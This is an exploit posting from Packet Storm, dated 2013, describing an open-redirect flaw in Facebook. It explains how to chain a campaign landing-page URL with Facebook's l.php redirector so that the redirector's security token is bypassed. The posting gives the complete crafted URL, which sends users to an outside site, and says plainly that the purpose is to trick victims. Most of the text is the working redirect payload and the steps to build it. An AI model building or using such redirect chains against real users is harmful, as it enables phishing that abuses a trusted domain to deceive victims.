Facebook Open Redirection

2013-11-18T00:00:00
ID PACKETSTORM:124059
Type packetstorm
Reporter Asesino04
Modified 2013-11-18T00:00:00

Description

                                        
                                            `# Exploit Title: Facebook URL open Redirection  
# Date: 05/11/2013 - 01/01/1435  
# Exploit Author: The Black Devils " Asesino04"  
# Vendor Homepage: http://www.facebook.com/   
# Tested on: Mozilla firefox  
  
------------------------------------------------  
First let's talk about redirection in facebook when you send a link to someone in facebook chat or post   
facebook create a security token for every single link , so your link must be like that so you can rediect   
http://www.facebook.com/l.php?u=attackersite.com&h=security token  
using this exploit you wont need security token and you can trick victimes easily   
  
------------------------------------------------  
# You go this page   
https://developers.facebook.com/docs/android/  
and you copy the link of "download sdk"   
  
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://developers.facebook.com/resources/facebook-android-sdk-current.zip  
  
  
# you keep only this   
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=  
  
# then you add to it   
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F  
  
#so it became like that :   
  
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F  
  
  
  
`